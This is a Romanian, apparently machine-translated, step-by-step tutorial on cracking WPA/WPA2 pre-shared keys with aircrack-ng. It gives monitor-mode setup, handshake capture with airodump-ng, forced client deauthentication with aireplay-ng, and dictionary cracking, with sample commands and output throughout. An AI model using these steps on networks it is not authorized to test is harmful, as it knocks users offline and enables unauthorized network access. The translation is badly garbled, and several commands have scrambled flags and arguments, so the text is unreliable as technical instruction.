Acest ghid explică modul de a sparge într-o rețea protejată prin WPA / WPA2 cu Pre-Shared Key (PSK). WPA / WPA2 suportă multe alte metode de autentificare, dar aircrack-ng hacks PSK numai, astfel încât asigurați-vă că airodump-ng prezinta rețea de autentificare de tip PSK. În caz contrar, nici măcar nu încearcă să intre în ea.
Există o diferență importantă între rupere WPA / WPA2 și WEP. Dacă WEP pentru a accelera procesul de rupere prin metode statistice, WPA poate fi sparta doar prin forta bruta. Acest lucru se datorează lipsei unei chei permanente, astfel încât colectarea vectorului inițial (IV) nu se accelerează procesul de cracare, cum ar fi un atac asupra WEP. Singura modalitate de a obține informații corecte - pentru a începe captarea pachete într-un punct de legătură între client și AP. Stabilirea unei conexiuni are loc în momentul în care un client intră în rețea (acest lucru nu este destul de adevărat, dar în contextul acestui document, vom fi ghidați de acest lucru). Lungimea PSK poate fi între 8 și 63 de caractere, și cu atât mai mare este, cu atât mai puțin probabilitatea de o pauză de succes.
Dar nu este fără speranță. În cazul în care cheia este cuvântul dicționar, sau cel puțin 8 caractere, de rupere posibil. Prin urmare, prin modul în care, desigur, modul de a crea un lanț incasabil - este suficient pentru a utiliza WPA / WPA2 și lungimea cheii de 63 de octeți, constând dintr-un set aleator de litere, cifre și psevdosimvolov.
Diferențele dintre WPA și WPA2 efracție acolo, se folosește aceeași autentificare, astfel încât aceeași tehnologie.
Verificați dacă sunt îndeplinite toate condițiile, în caz contrar sfaturile de mai jos este puțin probabil să vă ajute. De asemenea, nu uitați să înlocuiască ATH0 pe numele interfeței card wireless.
Pentru a verifica manual la domiciliu, trebuie să aveți două cărți fără fir. Noi folosim următoarele dispozitive:
• clientul Uke cu WPA2:
- MAC: 00: 0F: B5: FD: FB: C2
• AP:
- ESSID: Teddy
- MAC: 00: 14: 6C: 7E: 40: 80
- Canal: 9
• Sistem de Aircrack-ng:
- MAC: 00: 0F: B5: 88: AC: 82
Scopul nostru - pentru a captura pachete în timpul stabilirii unei conexiuni sigure și de a folosi aircrack-ng pentru a sparge PSK. Este posibil să se facă un activ și un mod pasiv. Active este de a trimite pachetul de la client deautentifikatsionnogo pasiv - de așteptare până când clientul începe să vă setați WPA / WPA2 conexiune. Avantajul metodei pasive este faptul că nu este nevoie de injecție, astfel încât realizarea de atac este posibil și sub Windows.
Aici sunt pașii de bază:
- Începe interfața fără fir în modul monitor pe AP canal;
- rula pe același filtru de canal-ng airodump conform BSSID;
- utilizarea aireplay-ng, la deautentifitsirovat client wireless;
- de a utiliza aircrack-ng pentru a sparge PSK.
Pasul 1: Porniți interfața de rețea wireless în modul monitor
Pentru a începe oprire ATH0:
# Airmon-ng oprire ATH0
Interfață șofer Chipset
wifi0 Atheros madwifi-ng
ATH0 Atheros madwifi-ng VAP (părinte: wifi0) (VAP distruse)
Asigurați-vă că există alte interfețe ATHX:
lo fără extensii wireless.
eth0 fără extensii wireless.
wifi0 nu există extensii wireless.
În cazul în care un alt ATHX prezent, le opri, de asemenea. Acum setați placa wireless pe canalul 9 în modul monitor:
# Airmon-ng începe să wifi0 9
În această comandă folosim «wifi0» în loc de obicei «ATH0», deoarece utilizarea madwifi-ng șofer. Răspunsul va fi ceva de genul:
Interfață șofer Chipset
wifi0 Atheros madwifi-ng
ATH0 Atheros madwifi-ng VAP (părinte: wifi0) (modul monitor activat)
Notă modul de monitorizare linie activat. Pentru a verifica dacă interfața este configurat corect, rulați:
lo fără extensii wireless.
wifi0 nu există extensii wireless.
eth0 fără extensii wireless.
ATH0 IEEE 802.11g ESSID: »» Nickname: »»
Mod: Monitor Frecventa: 2.452 GHz Access Point: 00: 0F: B5: 88: AC: 82
Bit Rate: 0 kb / s Tx-Putere: 18 dBm Sensibilitate = 0/3
Reîncercați: off RTS Thr: off Fragment Thr: off
cheia de criptare: off
Gestionarea consumului de energie: off
Link Quality = 0/94 Nivel semnal = -95 dBm Nivel de zgomot = -95 dBm
Rx NWID nevalid: 0 Rx criptă nevalid: 0 Rx frag nevalid: 0
Tx reîncercările excesive: 0 misc nevalid: 0 far pierdute: 0
Scopul acestui pas - pentru a prinde momentul cu AP stabili o conexiune sigură.
# Airodump-ng -c -bssid 9 00: 14: 6C: 7E: 40: 80 -w psk ATH0
Important: Nu utilizați -ivs. Ai nevoie pentru a captura pachete în întregime. Deci, în cazul în care clientul este conectat la punctul, vei vedea ceva de genul:
BSSID PWR RXQ Beacons #data, # / s CH MB ENC CIPHER AUTH ESSID
00: 14: 6C: 7E: 40: 39 100 51 80 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STAȚIA PWR Lost Pachete Sonde
00: 14: 6C: 7E: 40: 80 00: 0F: B5: FD: FB: C2 35 0116
Și în cazul în care clientul nu mai este activ, este:
BSSID PWR RXQ Beacons #data, # / s CH MB ENC CIPHER AUTH ESSID
00: 14: 6C: 7E: 40: 39 100 51 80 0 0 9 54 WPA2 CCMP PSK teddy
Se specifică faptul că, uneori, pentru a prinde momentul în care conexiunea este necesară pentru a efectua gesturi suplimentare. Cardul trebuie să fie în același mod ca AP și dispozitivul client. De exemplu, în cazul în care cardul se află în modul B, iar clientul - în modul de G, apoi prinde autentificarea nu va funcționa. uneori, poate fi necesar să setați aceeași viteză, de exemplu, 11 MB sau 54 MB. În general, în cazul în care nu a fost posibil să intercepteze configurarea conexiunii dintr-o dată, ar trebui să experimenteze.
Pasul 3: utilizați aireplay-ng, pentru a deconecta clientul.
Această etapă este opțională și se efectuează numai în cazul în care doriți să accelereze procesul de cracare. Desigur, pentru a efectua următoarele acțiuni trebuie să fie de cel puțin un client a fost conectat la punctul. Dacă sunteți în prezent nici un client wireless nu sunt acolo, relaxați-vă, și du-te direct la pasul următor. Desigur, în cazul în care, în viitor, clientul fără fir va, nimic nu vă împiedică să mergeți înapoi și să finalizeze toate comenzile următoare.
Deci, în această etapă vom trimite un mesaj fără fir la client că el nu mai este asociat cu AP. Clientul va încerca să restabilească o conexiune și trimite doar acele pachete de care avem nevoie.
Pe baza datelor obținute din etapa anterioară, executați pe o altă consolă următoarea comandă:
# Aireplay-ng -0 -a 1 00: 14: 6C: 7E: 40: 80 -c 00: 0F: B5: FD: FB: C2 ATH0
Răspunsul trebuie să fie:
11:09:28 Trimiterea DeAuth la stația - STMAC: [34: 30: 30 00: 0F: B5]
pachet Deautentifikatsionny este trimis direct de la computer la computer client, astfel încât asigurați-vă că sunteți destul de aproape de acesta din urmă.
Pasul 4: rula aircrack-ng și rupe PSK.
Scopul acestui pas - pentru a încerca să sparge cheia PSK prin selectarea unui dicționar. mic dicționar vine cu-ng aircrack (password.lst), dicționare și mai voluminoase pot fi găsite cu ușurință on-line sau de a genera propriul dvs. cu ajutorul programului bine-cunoscut John the Ripper.
Deschideți o nouă consolă și să rulați:
# Aircrack-ng -w password.lst -b 00: 14: 6C: 7E: 40: 80 psk * .cap
-password.lst w atribuie un nume de fișier cu un dicționar
psk * .cap atribuie un nume de fișier cu pachete capturate. Masca „*“ este folosit ca fișierul nu poate fi singur.
În cazul în care pachetele de autentificare nu sunt găsite, ieșirea va fi similară cu următoarea:
Deschiderea-01.cap psk
Deschiderea-02.cap psk
Deschiderea-03.cap psk
Citește 1827 pachete.
Nu există strângeri de mână WPA găsit.
Dacă se întâmplă acest lucru, încercați să repete al treilea pas și din nou bat clientul fără fir a rețelei, pentru a repeta procedura de stabilire a unei conexiuni. Dacă utilizați o metodă pasivă de pachete de colectare, așteptați în continuare până când clientul va fi stabilirea unei conexiuni. Concluzia în cazul constatării pachetului corespunzător va fi:
Deschiderea-01.cap psk
Deschiderea-02.cap psk
Deschiderea-03.cap psk
Deschiderea-04.cap psk
Citește 1827 pachete.
# BSSID ESSID de criptare
1 00: 14: 6C: 7E: 40: 80 ursuleț WPA (1 strângere de mână)
Alegerea prima rețea ca țintă.
Din acel moment aircrack-ng poate începe hacking PSK. În funcție de viteza procesorului și dimensiunea dicționarului, acest proces poate dura ore sau zile. cheie de succes hacking-ul arata ca acest lucru:
Aircrack-ng 0,8
[00:00:00] 2 chei testate (37.20 k / s)
FOUND CHEIE! [12345678]
Master Key. CD 69 0D 11 8E AC AA C5 C5 CE BB 59 85 49 3E 7D
B8 A6 C5 4A 72 82 38 13 ED C3 7E 2C 59 5E AB FD
Transcient cheie. 06 F8 BB F3 B1 AE EE 1F 55 66 AE 51 12 98 1F F8
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 40 7E CD
E1 FF 1D 65 17 93 41 64 32 0E BF 25 50 D5 4A 5E
2B 8C EA 20 90 32 15 A6 62 93 27 26 66 66 71 E0
EAPOL HMAC. 4E 27 D9 5B 91 53 57 00 88 66 29 9C C8 B1 D1 CB